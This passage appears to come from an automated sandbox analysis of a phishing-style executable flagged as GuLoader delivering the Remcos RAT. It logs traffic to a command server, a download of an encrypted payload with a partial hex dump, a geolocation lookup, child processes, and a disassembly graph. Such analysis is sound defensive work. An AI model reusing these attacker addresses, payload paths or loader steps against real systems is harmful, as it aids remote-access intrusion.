                                      Nov 4, 2024 09:27:38.911983967 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.911995888 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.912003994 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.912008047 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.912015915 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.912020922 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.912031889 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.912044048 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.912050962 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.912050962 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.912098885 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.912450075 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.912461042 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.912471056 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.912489891 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.912501097 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.912503958 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.912513971 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.912524939 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.912534952 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.912544012 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.912545919 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.912559032 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.912564993 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.912570000 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.912581921 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.912591934 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.912594080 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.912594080 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.912606001 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.912623882 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.912678003 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.930092096 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.943124056 CET8049712178.237.33.50192.168.2.8
                                      Nov 4, 2024 09:27:38.943176031 CET4971280192.168.2.8178.237.33.50
                                      Nov 4, 2024 09:27:40.787827969 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:40.792764902 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.792783976 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.792856932 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.792867899 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.792876959 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.792877913 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:40.792887926 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.792907953 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.792917967 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.792921066 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:40.792999029 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.793013096 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.797785044 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.797796011 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.797811985 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.797821999 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.798046112 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.798058033 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.798094988 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.854855061 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:40.860208988 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:40.860282898 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:28:04.915246010 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:28:04.916692972 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:28:04.922219992 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:28:34.928684950 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:28:34.930104017 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:28:34.935127020 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:29:05.119784117 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:29:05.121045113 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:29:05.125920057 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:29:21.128061056 CET4971280192.168.2.8178.237.33.50
                                      Nov 4, 2024 09:29:21.128149986 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:29:21.133444071 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:29:21.135535955 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:29:21.612137079 CET4971280192.168.2.8178.237.33.50
                                      Nov 4, 2024 09:29:22.221553087 CET4971280192.168.2.8178.237.33.50
                                      Nov 4, 2024 09:29:23.424639940 CET4971280192.168.2.8178.237.33.50
                                      Nov 4, 2024 09:29:25.924680948 CET4971280192.168.2.8178.237.33.50
                                      Nov 4, 2024 09:29:30.924669027 CET4971280192.168.2.8178.237.33.50
                                      Nov 4, 2024 09:29:35.132473946 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:29:35.136171103 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:29:35.141051054 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:29:40.612184048 CET4971280192.168.2.8178.237.33.50
                                      Nov 4, 2024 09:30:05.177146912 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:30:05.178607941 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:30:05.183445930 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:30:35.187555075 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:30:35.189225912 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:30:35.194077969 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:31:05.219089031 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:31:05.222171068 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:31:05.227040052 CET240449710162.251.122.106192.168.2.8

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 4, 2024 09:27:36.942615032 CET5070253192.168.2.81.1.1.1
                                      Nov 4, 2024 09:27:36.949572086 CET53507021.1.1.1192.168.2.8

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Nov 4, 2024 09:27:36.942615032 CET192.168.2.81.1.1.10xb9a8Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Nov 4, 2024 09:27:36.949572086 CET1.1.1.1192.168.2.80xb9a8No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • 212.162.149.38
                                      • geoplugin.net

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.849709212.162.149.38808112C:\Users\user\Desktop\orders_PI 008-01.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 4, 2024 09:27:31.139986992 CET177OUTGET /LnGWkyvzVtM166.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                      Host: 212.162.149.38
                                      Cache-Control: no-cache
                                      Nov 4, 2024 09:27:31.787652969 CET1236INHTTP/1.1 200 OK
                                      Content-Type: application/octet-stream
                                      Last-Modified: Mon, 04 Nov 2024 04:14:51 GMT
                                      Accept-Ranges: bytes
                                      ETag: "bccd2918702edb1:0"
                                      Server: Microsoft-IIS/8.5
                                      Date: Mon, 04 Nov 2024 08:27:31 GMT
                                      Content-Length: 494656
                                      Data Raw: 98 9b 18 1b 4e 6a 3b b7 f2 2d 46 e6 f7 30 86 df 65 0b fc 39 d4 e0 e5 3d 8b 34 d3 dc eb af a2 00 d9 da bd fe b7 bd 08 74 a5 b2 c4 6b 61 e8 43 30 ed 4c c6 05 d3 35 a4 4b 16 37 46 26 e3 c2 cb e0 fa 4d c6 12 0a ad 58 3d de 85 33 6c 3d a3 43 95 31 c7 b2 87 6f 1c 25 8c 13 b5 98 c8 3d bf 9c ab 24 28 64 5e de ac e1 77 da 0a f3 e2 cf 78 f2 41 25 2b 93 5d c7 a8 7d d5 95 20 30 17 24 43 96 ae 20 4e cb 4a a7 e2 2d 02 84 e3 96 39 c6 23 3e 9e 93 bd 28 f0 09 2c e5 ca de 3d 9d 1d 92 c2 18 1e f2 70 77 d0 d4 c6 ed 49 b0 8e 38 f4 44 db c6 b0 bc a7 59 c7 97 e3 23 a5 e7 2e b4 9d 54 73 44 ab 26 a1 f0 02 2d af 8d 70 dc ff 32 43 f6 9b 19 a6 2a 4c 82 fe 03 5a 29 c9 7b 6c cb 9b d1 18 1f 7f cf 55 d7 91 92 fb 9b 21 5a b2 59 af 6f 1d c9 f1 46 e2 f0 c5 28 13 e9 e9 c6 a3 55 bb 72 71 34 9f 62 fa 05 fa 47 7b 4c 28 ef a9 0c 1a 97 a2 9a 4d fe 5b 7f 1f 07 6f cc 2d 9f 66 5d 1b 02 c7 ce 74 3e bf 6b d8 c2 8a b3 fd 9f ec 53 3a b1 d6 2b 07 60 27 e1 90 c4 c4 8e 95 69 cc db 73 8c 28 c7 8e 18 fc 37 ec bc 7c 13 2d e9 43 a0 34 75 3d 83 be 0e dc [TRUNCATED]
                                      Data Ascii: Nj;-F0e9=4tkaC0L5K7F&MX=3l=C1o%=$(d^wxA%+]} 0$C NJ-9#>(,=pwI8DY#.TsD&-p2C*LZ){lU!ZYoF(Urq4bG{L(M[o-f]t>kS:+`'is(7|-C4u=kdH|zgqYFu!#^"=JWa&A%Qyfx\ey/_=-Vz.9Y{$;pH_V(H81Qt7yoK@'Mh#Xr%2W6_3<~8\?Ua?~6u5EzD4:/j$q0[J(mMXi1kXlQj3J~}_L;q,8W8Imes0o05&Us|x_NWipCt^_JA?M0hzHhiPkLNKT/NK;qbytq)?u-x=">rXgXG2X@Ed6*6$hX )<Hi@fAm/%BGi>'I'6OLf2NADaCISZl1p$|e0'L)&yLC;55,;-uz7$|/idG,xS^^{*AX5:<{S"'/l{N!
                                      Nov 4, 2024 09:27:31.787672043 CET1236INData Raw: cb ad 30 07 25 0d 63 ee 10 9c cf f4 14 24 10 50 73 8e bc ba ec 12 c0 19 82 e9 8d d5 45 a4 f0 b5 4c d3 c1 5a 2b be 53 e5 71 00 16 c1 16 4e fb 9d 7e 23 dc fb f2 92 94 25 80 26 9d 1a ee 03 c2 27 1d b4 8e 62 9d f9 18 43 09 71 7a 4e e7 3c 4c d1 13 77
                                      Data Ascii: 0%c$PsELZ+SqN~#%&'bCqzN<LwxyCn$o36ZVs'+Tm}Z)1zu3LxHfFm,jp&D]y"wG3~T16w[rn1JDfCr.
                                      Nov 4, 2024 09:27:31.787682056 CET1236INData Raw: c1 aa fb 53 0d f3 33 15 c1 4f 8d 42 e5 27 64 dc 13 a6 9e 94 25 e8 83 1c 5f ee eb ae 14 1e b4 d7 a1 f7 f9 a1 d3 50 36 7a a6 b3 0e 4c d1 7b d8 14 48 c2 90 43 4a 40 81 de 5e 06 cc 1f 8f a0 24 63 16 f0 c9 ee 06 f6 e8 89 ad 59 ef f1 a1 4d 36 7e fe e8
                                      Data Ascii: S3OB'd%_P6zL{HCJ@^$cYM6~_R)}d|XZU-_o1O(b<PT<w8YjRX*|5GHHQ8F?.\2Xr)i$Q"jo>fm+oI<%Uo"6E
                                      Nov 4, 2024 09:27:31.787714958 CET1236INData Raw: 18 43 50 fa aa c3 6b 18 d0 d1 13 77 7d 4b d7 78 17 20 c8 51 0a 11 4a a4 d6 c9 a0 a4 95 cb b6 c9 48 98 e2 f7 80 89 6d f8 cf 74 df 73 27 d6 64 2a 12 ff 1c fa 5c 10 b2 ef 4c d0 1b 78 5e 65 e8 77 5f 00 8c d3 16 f1 9a 97 bf f7 e5 b1 a2 c6 c5 be e4 48
                                      Data Ascii: CPkw}Kx QJHmts'd*\Lx^ew_H:KLxnGB<.vjW7] Sw:Z5,3;-t3[r1"bMlypjHI5&Hpp2 H/m=%<KS$%26w`
                                      Nov 4, 2024 09:27:31.787725925 CET848INData Raw: ac e6 ea 09 47 1b b7 b5 73 f3 19 90 b3 0e 8e 3c 36 8c 43 b2 b8 ea 8d a1 f5 9f 05 e0 8b 8d 40 01 97 6b 95 47 8c 64 35 67 f8 29 8a e1 27 f9 93 42 f1 f3 7e c5 5f fa a7 3a 19 94 3b c9 94 55 e2 ee 62 0b f4 e5 41 20 ed ad 19 dd 30 7a 13 82 a1 e1 cc a3
                                      Data Ascii: Gs<6C@kGd5g)'B~_:;UbA 0z{V08Gz40-WCv2[r+1n=pB.g]Mg?a+K^`X=^C"><Y6$(djv%_ NAbprD<$v
                                      Nov 4, 2024 09:27:31.799107075 CET1236INData Raw: 29 8e 8c ff 1c 48 f9 0f ec 77 b6 56 80 48 3a 65 31 26 6a a7 95 3e 93 b8 97 47 5d 67 0e 7a ed 32 eb c5 85 00 6c 31 66 5d e0 fd 62 6b 05 c8 6b fa a8 81 e6 ed 35 65 8d f5 22 ee 92 28 d5 dc fa 95 d1 30 eb 63 d4 c1 b2 b7 96 bf 50 33 55 93 43 07 85 55
                                      Data Ascii: )HwVH:e1&j>G]gz2l1f]bkk5e"(0cP3UCUtTJJT4N!dFKAgDSQjOKRRd"cf<Z\?D;<Ael#(;+#YUy/dMO,:<}M<{_/#=}>(g
                                      Nov 4, 2024 09:27:31.799146891 CET1236INData Raw: 12 10 da 02 51 e6 52 9e 1c c9 a7 e5 34 f8 5a d7 9f c9 13 89 39 24 e1 24 c7 f9 70 53 41 ac 54 2d ea 87 c1 cc 4a 69 40 80 9c ed 87 94 4c af 23 8b ae 8c 37 99 c1 b6 2b 1c 59 ec d2 42 07 42 03 5d a8 77 34 7a f3 36 05 aa 1f c0 8e 25 fd cd 3c 9b 54 12
                                      Data Ascii: QR4Z9$$pSAT-Ji@L#7+YBB]w4z6%<T{hx-!wJp@37Esaq<NOS ]@3{gkh5leVn(5Q7i$dkZH:j5j<2(jIV2&p"63%cL4x-R9NbM
                                      Nov 4, 2024 09:27:31.799159050 CET424INData Raw: d7 7a e2 8f 33 af 9a be 35 9a 6d a6 ce c1 c9 17 63 2a 3d ed e3 d8 7e c1 f9 8f 3e 27 49 d4 db 53 8e d3 40 14 21 dc 60 a7 25 67 aa 7a 4b c9 55 9b 35 da 18 74 51 cf 83 0b 0e bd 52 f8 d1 a3 08 76 4c 69 03 82 14 e6 69 1e 31 0a f9 ad c8 0d 31 99 cf 4e
                                      Data Ascii: z35mc*=~>'IS@!`%gzKU5tQRvLii11N.j!Yc<AAFPPeU/*M6$#D,|>\!R^ZMZqI7&'4K`_ED;IT@bB=nRJ)C.Sn:r-nkki~g'
                                      Nov 4, 2024 09:27:31.799231052 CET1236INData Raw: 05 94 69 92 33 ae 5f 1a 11 fd d1 0e 65 4a e5 6c fa 3f 30 08 3d 3e c1 84 4e 3c 62 5e f9 3b 26 97 d5 72 7f cc 93 49 5c ca d0 6d 4c 7a 56 86 97 e3 bf 81 72 dd 24 3e bf 9c ab d3 5d 88 65 16 da f1 fc 19 21 32 69 9a 9c c9 91 a8 1f 82 2b c5 23 8e 56 f0
                                      Data Ascii: i3_eJl?0=>N<b^;&rI\mLzVr$>]e!2i+#V0zC%XMku/y{Ovz~?x(+]x=0hTsHDO~Ctxo8R6t;^.XIejHVveW^
                                      Nov 4, 2024 09:27:31.799243927 CET1236INData Raw: be 21 d2 b4 a2 94 89 c7 36 47 1b 37 a8 c9 5b e5 15 85 31 57 43 aa 24 28 34 d3 9b 50 6a b9 8a e2 bc 13 30 87 a2 cc 68 23 7b 97 c6 a8 7d 85 1e ee d8 96 c6 bd 69 45 11 dc 34 54 f7 db 69 db 4d 9a 96 75 0b 52 e7 bb ea 26 b5 81 7b 43 d2 35 fa 58 ed f3
                                      Data Ascii: !6G7[1WC$(4Pj0h#{}iE4TiMuR&{C5XPyd^kj\5J0.zurDW~MGZ@uJ&;;/RX?;TOe~P)09eV(WT.Ho5kVvw1rX;.v
                                      Nov 4, 2024 09:27:31.799257040 CET1236INData Raw: 2d 79 8f cd 53 62 a2 38 2c bd a1 b6 73 67 9c f2 aa 39 45 d1 ae fa 10 83 4a af c5 28 5f df 25 e3 2a b5 09 05 4d cc 8c f0 8d d7 50 7d a1 42 81 ae 27 b0 2a d9 0e d7 bd f4 3f 56 cf 6f 16 a9 2b cc c1 1e fc f5 c4 6b f5 32 1f a5 e3 e7 3e e1 75 9b 82 bb
                                      Data Ascii: -ySb8,sg9EJ(_%*MP}B'*?Vo+k2>uTl7A~D]2M>n.<C!UmMOlOo=zTS4mAW,b#?ixQrW!s$]o5dC6)ZtHOn5NTnIAze5u+^


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.849712178.237.33.50808112C:\Users\user\Desktop\orders_PI 008-01.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 4, 2024 09:27:36.958673000 CET71OUTGET /json.gp HTTP/1.1
                                      Host: geoplugin.net
                                      Cache-Control: no-cache
                                      Nov 4, 2024 09:27:37.819782019 CET1165INHTTP/1.1 200 OK
                                      date: Mon, 04 Nov 2024 08:27:37 GMT
                                      server: Apache
                                      content-length: 957
                                      content-type: application/json; charset=utf-8
                                      cache-control: public, max-age=300
                                      access-control-allow-origin: *
                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
                                      Data Ascii: { "geoplugin_request":"173.254.250.69", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:03:27:03
                                      Start date:04/11/2024
                                      Path:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\orders_PI 008-01.exe"
                                      Imagebase:0x400000
                                      File size:906'904 bytes
                                      MD5 hash:5009D8C72623D30CE09149187C66D37C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1643832066.00000000046DE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:03:27:26
                                      Start date:04/11/2024
                                      Path:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\orders_PI 008-01.exe"
                                      Imagebase:0x400000
                                      File size:906'904 bytes
                                      MD5 hash:5009D8C72623D30CE09149187C66D37C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3887015432.000000000358D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3879351770.000000000019F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:5
                                      Start time:03:27:38
                                      Start date:04/11/2024
                                      Path:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\zwewot"
                                      Imagebase:0x400000
                                      File size:906'904 bytes
                                      MD5 hash:5009D8C72623D30CE09149187C66D37C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:03:27:38
                                      Start date:04/11/2024
                                      Path:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\jqrhomwbo"
                                      Imagebase:0x400000
                                      File size:906'904 bytes
                                      MD5 hash:5009D8C72623D30CE09149187C66D37C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:03:27:38
                                      Start date:04/11/2024
                                      Path:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\msxapegdbomic"
                                      Imagebase:0x400000
                                      File size:906'904 bytes
                                      MD5 hash:5009D8C72623D30CE09149187C66D37C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:20%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:20.9%
                                        Total number of Nodes:704
                                        Total number of Limit Nodes:16
                                        execution_graph 3397 6ff416d4 3398 6ff41703 3397->3398 3399 6ff41b5f 22 API calls 3398->3399 3400 6ff4170a 3399->3400 3401 6ff41711 3400->3401 3402 6ff4171d 3400->3402 3403 6ff41272 2 API calls 3401->3403 3404 6ff41744 3402->3404 3405 6ff41727 3402->3405 3406 6ff4171b 3403->3406 3408 6ff4176e 3404->3408 3409 6ff4174a 3404->3409 3407 6ff4153d 3 API calls 3405->3407 3411 6ff4172c 3407->3411 3410 6ff4153d 3 API calls 3408->3410 3412 6ff415b4 3 API calls 3409->3412 3410->3406 3413 6ff415b4 3 API calls 3411->3413 3414 6ff4174f 3412->3414 3416 6ff41732 3413->3416 3415 6ff41272 2 API calls 3414->3415 3417 6ff41755 GlobalFree 3415->3417 3418 6ff41272 2 API calls 3416->3418 3417->3406 3419 6ff41769 GlobalFree 3417->3419 3420 6ff41738 GlobalFree 3418->3420 3419->3406 3420->3406 2635 4034a2 SetErrorMode GetVersion 2636 4034e1 2635->2636 2637 4034e7 2635->2637 2638 4067e3 5 API calls 2636->2638 2725 406773 GetSystemDirectoryW 2637->2725 2638->2637 2640 4034fd lstrlenA 2640->2637 2641 40350d 2640->2641 2728 4067e3 GetModuleHandleA 2641->2728 2644 4067e3 5 API calls 2645 40351b 2644->2645 2646 4067e3 5 API calls 2645->2646 2647 403527 #17 OleInitialize SHGetFileInfoW 2646->2647 2734 4063ee lstrcpynW 2647->2734 2650 403573 GetCommandLineW 2735 4063ee lstrcpynW 2650->2735 2652 403585 2736 405cf0 2652->2736 2655 4036d4 GetTempPathW 2740 403471 2655->2740 2657 4036ec 2659 4036f0 GetWindowsDirectoryW lstrcatW 2657->2659 2660 403746 DeleteFileW 2657->2660 2658 4035c3 2661 405cf0 CharNextW 2658->2661 2668 4036bf 2658->2668 2671 4036bd 2658->2671 2663 403471 12 API calls 2659->2663 2750 403015 GetTickCount GetModuleFileNameW 2660->2750 2661->2658 2664 40370c 2663->2664 2664->2660 2666 403710 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2664->2666 2665 40375a 2673 405cf0 CharNextW 2665->2673 2676 40380d 2665->2676 2708 4037fd 2665->2708 2667 403471 12 API calls 2666->2667 2670 40373e 2667->2670 2867 4063ee lstrcpynW 2668->2867 2670->2660 2670->2676 2671->2655 2691 403779 2673->2691 2884 4039e3 2676->2884 2677 403947 2680 4039cb ExitProcess 2677->2680 2681 40394f GetCurrentProcess OpenProcessToken 2677->2681 2678 403827 2891 405a54 2678->2891 2686 403967 LookupPrivilegeValueW AdjustTokenPrivileges 2681->2686 2687 40399b 2681->2687 2684 4037d7 2868 405dcb 2684->2868 2685 40383d 2834 4059bf 2685->2834 2686->2687 2690 4067e3 5 API calls 2687->2690 2694 4039a2 2690->2694 2691->2684 2691->2685 2697 4039b7 ExitWindowsEx 2694->2697 2700 4039c4 2694->2700 2695 403853 lstrcatW 2696 40385e lstrcatW lstrcmpiW 2695->2696 2696->2676 2699 40387a 2696->2699 2697->2680 2697->2700 2702 403886 2699->2702 2703 40387f 2699->2703 2899 40140b 2700->2899 2701 4037f2 2883 4063ee lstrcpynW 2701->2883 2895 4059a2 CreateDirectoryW 2702->2895 2837 405925 CreateDirectoryW 2703->2837 2778 403abd 2708->2778 2710 40388b SetCurrentDirectoryW 2711 4038a6 2710->2711 2712 40389b 2710->2712 2842 4063ee lstrcpynW 2711->2842 2898 4063ee lstrcpynW 2712->2898 2717 4038f2 CopyFileW 2722 4038b4 2717->2722 2718 40393b 2719 4061b4 36 API calls 2718->2719 2719->2676 2721 40642b 17 API calls 2721->2722 2722->2718 2722->2721 2724 403926 CloseHandle 2722->2724 2843 40642b 2722->2843 2860 4061b4 MoveFileExW 2722->2860 2864 4059d7 CreateProcessW 2722->2864 2724->2722 2726 406795 wsprintfW LoadLibraryExW 2725->2726 2726->2640 2729 406809 GetProcAddress 2728->2729 2730 4067ff 2728->2730 2732 403514 2729->2732 2731 406773 3 API calls 2730->2731 2733 406805 2731->2733 2732->2644 2733->2729 2733->2732 2734->2650 2735->2652 2737 405cf6 2736->2737 2738 4035aa CharNextW 2737->2738 2739 405cfd CharNextW 2737->2739 2738->2655 2738->2658 2739->2737 2902 40669d 2740->2902 2742 403487 2742->2657 2743 40347d 2743->2742 2911 405cc3 lstrlenW 